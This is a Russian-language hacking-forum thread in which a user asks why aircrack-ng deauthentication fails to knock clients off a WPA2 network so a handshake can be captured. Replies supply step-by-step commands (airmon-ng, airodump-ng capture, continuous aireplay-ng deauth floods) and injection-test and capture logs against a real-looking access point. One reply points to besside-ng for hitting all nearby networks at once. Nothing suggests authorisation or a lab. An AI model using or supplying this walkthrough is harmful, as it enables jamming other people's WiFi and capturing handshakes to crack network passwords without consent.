WiFi [Вопрос] По перехвату хендшейка

[MobD1pp]

Всем привет! Пытаюсь перехватить хендшейк через aircrack-ng, но что-то не идёт. Делаю всё по шагам:

1. Ставлю адаптер в режим мониторинга:
   sudo airmon-ng start wlan0
   Получаю wlan0mon, всё ок.
2. Сканирую сети через:
   sudo airodump-ng wlan0mon
   Нашёл цель, BSSID 00:11:22:33:44:55, канал 6.
3. Запускаю перехват:
   sudo airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write handshake wlan0mon
   Пакеты идут, всё нормально.
4. Пытаюсь выбить клиентов деаутентификацией:
   sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 wlan0mon
   Отправляю на broadcast, но ничего не происходит — клиенты не отваливаются, хендшейк не ловится. Пробовал увеличить количество пакетов до 50 — тот же результат.

Может, я что-то упускаю? Есть идеи, почему деаутентификация не работает? Может, есть тулзы под данную задачу автоматизированные?? Заранее спасибо за помощь!

 

[marmai]

а у тебя твоя wifi карта поддерживает вообще инъекции?

 

[MobD1pp]

а у тебя твоя wifi карта поддерживает вообще инъекции?

09:24:04 Trying broadcast probe requests...
09:24:06 No Answer...
09:24:06 Found 2 APs

09:24:06 Trying directed probe requests...
09:24:06 1C:66:B6:71:B1:55 - channel: 3 - '444'
09:24:12 0/30: 0%

09:24:13 E4:Z1:2A:E8:602 - channel: 2 - 'TP-Link'
09:24:18 Ping (min/avg/max): 35.328ms/35.328ms/35.328ms Power: -53.00
09:24:18 1/30: 3%

09:24:18 Injection is working!

 

[MobD1pp]

aireplay-ng --test wlan1mon

а у тебя твоя wifi карта поддерживает вообще инъекции?

 

[174region174]

Всем привет! Пытаюсь перехватить хендшейк через aircrack-ng, но что-то не идёт. Делаю всё по шагам:

1. Ставлю адаптер в режим мониторинга:
   sudo airmon-ng start wlan0
   Получаю wlan0mon, всё ок.
2. Сканирую сети через:
   sudo airodump-ng wlan0mon
   Нашёл цель, BSSID 00:11:22:33:44:55, канал 6.
3. Запускаю перехват:
   sudo airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write handshake wlan0mon
   Пакеты идут, всё нормально.
4. Пытаюсь выбить клиентов деаутентификацией:
   sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 wlan0mon
   Отправляю на broadcast, но ничего не происходит — клиенты не отваливаются, хендшейк не ловится. Пробовал увеличить количество пакетов до 50 — тот же результат.

Может, я что-то упускаю? Есть идеи, почему деаутентификация не работает? Может, есть тулзы под данную задачу автоматизированные?? Заранее спасибо за помощь!

Можешь просто оставить на время. Когда на точке клиент сам отключится и подключится хенд залетит. А вообще скорее всего просто мощности твоего адаптера не хватает. Что бы заглушить сеть.

 

[MobD1pp]

Можешь просто оставить на время. Когда на точке клиент сам отключится и подключится хенд залетит. А вообще скорее всего просто мощности твоего адаптера не хватает. Что бы заглушить сеть.

Если не хватает мощности - то невозможен перехват в принципе?

 

[174region174]

Если не хватает мощности - то невозможен перехват в принципе?

Я же тебе написал.
Поставь
sudo airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write handshake wlan0mon
И иди гуляй. Или спать ложись.
Жди когда клиенты сами гулять пойдут и потом вернутся.

 

[InCrease]

sudo -i
пароль рута

airmon-ng start wlan0
airmon-ng check kill (желательно)
airodump-ng wlan0mon (ищем нужную сеть по bssid и каналу)
cntr+c
airodump-ng wlan0mon -d 00:11:22:33:44:55 (наблюдаем за выбраной сетью)
cntr+c
airodump-ng -w handshake_save_name -c 12 --bssid 00:11:22:33:44:55 wlan0mon (ловим рукопожатие и сохраняем в файл) (-c 12 это канал)


в другом окне терминала или на другом девайсе
aireplay-ng --deauth 0 00:11:22:33:44:55 wlan0mon (попытки деаута)

дальше ждать, иногда нужно ждать сутками, обычно 30-90 минут.

 

[MobD1pp]

Ребятки Thanks

пойду гулять и запущу
по результату тоже отпишу

 

[MobD1pp]

sudo -i
пароль рута

airmon-ng start wlan0
airmon-ng check kill (желательно)
airodump-ng wlan0mon (ищем нужную сеть по bssid и каналу)
cntr+c
airodump-ng wlan0mon -d 00:11:22:33:44:55 (наблюдаем за выбраной сетью)
cntr+c
airodump-ng -w handshake_save_name -c 12 --bssid 00:11:22:33:44:55 wlan0mon (ловим рукопожатие и сохраняем в файл) (-c 12 это канал)


в другом окне терминала или на другом девайсе
aireplay-ng --deauth 0 00:11:22:33:44:55 wlan0mon (попытки деаута)

дальше ждать, иногда нужно ждать сутками, обычно 30-90 минут.

Я же тебе написал.
Поставь
sudo airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write handshake wlan0mon
И иди гуляй. Или спать ложись.
Жди когда клиенты сами гулять пойдут и потом вернутся.

Запустил

sudo airodump-ng --bssid 6C:5A:B0:F2:41:C4 --channel 10 --write handshake wlo1
12:18:17 Created capture file "handshake-03.cap".
CH 10 ][ Elapsed: 18 mins ][ 2025-06-15 12:36

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

6C:5 -58 93 568 5 0 10 270 WPA2 CCMP PSK

BSSID STATION PWR Rate Lost Frames Notes Probes

sudo aireplay-ng --deauth 0 -a 6C:5A:B0:F2:41:C4 wlo1
12:36:29 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:30 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:30 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:31 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:31 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:32 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:32 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:32 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:33 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:33 Sending DeAuth (code 7) to broadcast -- BSSID:
12:36:34 Sending DeAuth (code 7) to broadcast -- BSSID:

В папке создалось 3 хендшейка - они пустые? Все верно делаю? Или уже перехватил?

 

[174region174]

Запустил




В папке создалось 3 хендшейка - они пустые? Все верно делаю? Или уже перехватил?

когда поймается хендшейк в терминале будет написано это

 

[Фантомас]

Некоторые точки могут вообще не реагировать на атаки деаутентификации. Не мучайся, а лови сразу всех скопом
в Kali sudo besside-ng или
вот же расписано всё для начинающих